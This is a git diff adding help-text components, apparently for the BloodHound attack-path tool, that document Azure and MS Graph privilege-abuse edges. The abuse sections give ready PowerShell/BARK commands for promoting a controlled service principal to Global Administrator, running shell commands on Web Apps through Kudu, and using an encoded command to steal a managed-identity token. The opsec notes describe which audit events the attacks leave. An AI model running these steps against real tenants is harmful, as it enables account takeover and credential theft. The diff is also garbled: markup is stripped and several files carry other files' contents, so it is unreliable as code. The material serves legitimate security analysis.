+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGDirectory_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ With the ability to grant arbitrary app roles, you can grant + the RoleManagement.ReadWrite.Directory app role to a Service + Principal you already control, and then promote it or another + principal to Global Administrator. +
+ ++ These functions require you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to grant app roles. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Use BARK's Get-AllAzureADServicePrincipals to collect all + Service Principal objects in the tenant: +
+ +
+
+ {
+ '$SPs = Get-AllAzureADServicePrincipals `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + Next, find the MS Graph Service Principal's ID. You can do this by + piping $SPs to Where-Object, finding objects where the appId value + matches the universal ID for the MS Graph Service Principal, which is + 00000003-0000-0000-c000-000000000000: +
+ +
+
+ {
+ '$SPs | ?{$_.appId -Like "00000003-0000-0000-c000-000000000000"} | Select id'
+ }
+
+
+
+ + The output will be the object ID of the MS Graph Service Principal. + Take that ID and use it as the "ResourceID" argument for BARK's + New-AppRoleAssignment function. The AppRoleID of '9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8' + is the universal ID for RoleManagement.ReadWrite.Directory. The + SPObjectId is the object ID of the Service Principal you want to grant + this app role to: +
+ +
+
+ {
+ 'New-AppRoleAssignment `\n' +
+ ' -SPObjectId "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -AppRoleID "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" `\n' +
+ ' -ResourceID "9858020a-4c00-4399-9ae4-e7897a8333fa" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output of this command will show you the App Role + assignment ID. Now that your Service Principal has the RoleManagement.ReadWrite.Directory + MS Graph app role, you can promote the Service Principal to Global Administrator + using BARK's New-AzureADRoleAssignment. +
+ +
+
+ {
+ 'New-AzureADRoleAssignment `\n' +
+ ' -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output will include the principal ID, the role ID, and a + unique ID for the role assignment. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx new file mode 100644 index 000000000..52591032f --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/General.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + AzureAD tenant objects when a Service Principal has one of the following + MS Graph app role assignments: +
+ ++
+ When you assign an app role to a Service Principal, the Azure + Audit logs will create an event called "Add app role assignment + to service principal". This event describes who made the change, + what the target service principal was, and what app role assignment + was granted. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantAppRoles/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ To abuse this privilege, you can promote a principal you control + to Global Administrator using BARK's New-AzureADRoleAssignment. +
+ ++ This function requires you to supply an MS Graph-scoped JWT + associated with the Service Principal that has the privilege + to grant AzureAD admin roles. There are several ways to + acquire a JWT. For example, you may use BARK’s + Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT + by supplying a Service Principal Client ID and secret: +
+ +
+
+ {
+ '$MGToken = Get-MSGraphTokenWithClientCredentials `\n' +
+ ' -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `\n' +
+ ' -ClientSecret "asdf..." `\n' +
+ ' -TenantName "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Then use BARK's New-AzureADRoleAssignment function to grant the + AzureAD role to your target principal: +
+ +
+
+ {
+ 'New-AzureADRoleAssignment `\n' +
+ ' -PrincipalID "6b6f9289-fe92-4930-a331-9575e0a4c1d8" `\n' +
+ ' -RoleDefinitionId "62e90394-69f5-4237-9190-012177145e10" `\n' +
+ ' -Token $MGToken'
+ }
+
+
+
+ + If successful, the output will include the principal ID, the role ID, and a + unique ID for the role assignment. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx new file mode 100644 index 000000000..67d9348e0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantRole/General.jsx @@ -0,0 +1,27 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created during post-processing. It is created against + all AzureAD admin roles when a Service Principal has the following + MS Graph app role assignment: +
+ ++
+ This privilege allows the Service Principal to promote itself or + any other principal to any AzureAD admin role, including Global + Administrator. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx new file mode 100644 index 000000000..72777be38 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantRole/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ When you assign an AzureAD admin role to a principal + using this privilege, the Azure Audit log will create + an event called "Add member to role outside of PIM + (permanent)". +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx b/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx new file mode 100644 index 000000000..02ec5e424 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGrantRole/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx new file mode 100644 index 000000000..dde78bc45 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..324de0216 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the GroupMember.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroupMember_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx new file mode 100644 index 000000000..7841ebf31 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..a467563f9 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the Group.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGGroup_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx new file mode 100644 index 000000000..f618fc963 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx new file mode 100644 index 000000000..91534c348 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the RoleManagement.ReadWrite.Directory edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx new file mode 100644 index 000000000..bb21ba56d --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGRoleManagement_ReadWrite_Directory/References.jsx @@ -0,0 +1,22 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx new file mode 100644 index 000000000..d5f0042d2 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/General.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const General = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx new file mode 100644 index 000000000..3e4ae4648 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/Opsec.jsx @@ -0,0 +1,16 @@ +import React from 'react'; + +const Opsec = () => { + return ( + <> ++ This edge is created when a Service Principal has been + granted the ServicePrincipalEndpoint.ReadWrite.All edge. The edge is + not abusable, but is used during post-processing to create + abusable edges. +
+ > + ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx new file mode 100644 index 000000000..c870f5bae --- /dev/null +++ b/src/components/Modals/HelpTexts/AZMGServicePrincipalEndpoint_ReadWrite_All/References.jsx @@ -0,0 +1,18 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + ATT&CK T1098: Account Manipulation + ++ You will abuse this relationship by executing a command + against the AKS Managed Cluster the edge is emiting from. + You can target any managed identity assignment scoped to + the Virtual Machine Scale Sets under the target Resource Group. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx new file mode 100644 index 000000000..33a9d550f --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/General.jsx @@ -0,0 +1,23 @@ +import React from 'react'; + +const General = () => { + return ( + <> + ++ This edge is created to link Azure Kubernetes Service + Managed Clusters to the Virtual Machine Scale Sets they + use to execute commands on. +
+ ++ The system-assigned identity for the AKS Cluster will + have the Contributor role against the target Resource Group + and its child Virtual Machine Scale Sets. +
+ + > + ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx b/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx new file mode 100644 index 000000000..457bae3bf --- /dev/null +++ b/src/components/Modals/HelpTexts/AZNodeResourceGroup/References.jsx @@ -0,0 +1,17 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + ++ You can use BARK's Invoke-AzureRMWebAppShellCommand function + to execute commands on a target Web App. You can use BARK's + New-PowerShellFunctionAppFunction, Get-AzureFunctionAppMasterKeys, + and Get-AzureFunctionOutput functions to execute arbitrary + commands against a target Function App. +
+ ++ These functions require you to supply an Azure Resource Manager + scoped JWT associated with the principal that has the privilege + to execute commands on the web app or function app. There are + several ways to acquire a JWT. For example, you may use BARK's + Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT + by supplying a refresh token: +
+ +
+
+ {
+ '$ARMToken = Get-ARMTokenWithRefreshToken `\n' +
+ ' -RefreshToken "0.ARwA6WgJJ9X2qk…" `\n' +
+ ' -TenantID "contoso.onmicrosoft.com"'
+ }
+
+
+
+ + Now you can use BARK's Invoke-AzureRMWebAppShellCommand function + to execute a command against the target Web App. + For example, to run a simple "whoami" command: +
+ +
+
+ {
+ 'Invoke-AzureRMWebAppShellCommand `\n' +
+ ' -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" `\n' +
+ ' -Token $ARMToken `\n' +
+ ' -Command "whoami"'
+ }
+
+
+
+
+ + If the Web App has a managed identity assignments, you can use BARK's + Invoke-AzureRMWebAppShellCommand function to retrieve a JWT for the + managed identity Service Principal like this: +
+ + +
+
+ {
+ 'PS C:\> $PowerShellCommand = ' + '\n' +
+ ' $headers=@{"X-IDENTITY-HEADER"=$env:IDENTITY_HEADER}\n' +
+ ' $response = Invoke-WebRequest -UseBasicParsing -Uri "$($env:IDENTITY_ENDPOINT)?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers $headers\n' +
+ ' $response.RawContent' + '\n\n' +
+
+ 'PS C:\> $base64Cmd = [System.Convert]::ToBase64String(\n' +
+ ' [System.Text.Encoding]::Unicode.GetBytes(\n' +
+ ' $PowerShellCommand\n' +
+ ' )\n' +
+ ' )\n\n' +
+
+ 'PS C:\> $Command = "powershell -enc $($base64Cmd)"\n\n' +
+
+ 'PS C:\> Invoke-AzureRMWebAppShellCommand `\n' +
+ ' -KuduURI "https://mycoolwindowswebapp.scm.azurewebsites.net/api/command" `\n' +
+ ' -token $ARMToken `\n' +
+ ' -Command $Command'
+ }
+
+
+
+
+ + If successful, the output will include a JWT for the managed identity + service principal. +
+ > + ); +}; + +export default Abuse; diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx new file mode 100644 index 000000000..999403b35 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/General.jsx @@ -0,0 +1,14 @@ +import React from 'react'; + +const General = () => { + return ( ++ The Website Contributor role grants full control of the target + Function App or Web App. Full control of either of those types + of resources allows for arbitrary command execution against the + target resoruce. +
+ ); +}; + +export default General; diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx new file mode 100644 index 000000000..1d2ddcaf0 --- /dev/null +++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/Opsec.jsx @@ -0,0 +1,12 @@ +import React from 'react'; + +const Opsec = () => { + return ( ++ This will depend on which particular abuse you perform, but in + general Azure will create a log event for each abuse. +
+ ); +}; + +export default Opsec; diff --git a/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx b/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx new file mode 100644 index 000000000..93ab469fc --- /dev/null +++ b/src/components/Modals/HelpTexts/AZWebsiteContributor/References.jsx @@ -0,0 +1,21 @@ +import React from 'react'; + +const References = () => { + return ( + <> + + Andy Robbins - BARK.ps1 + +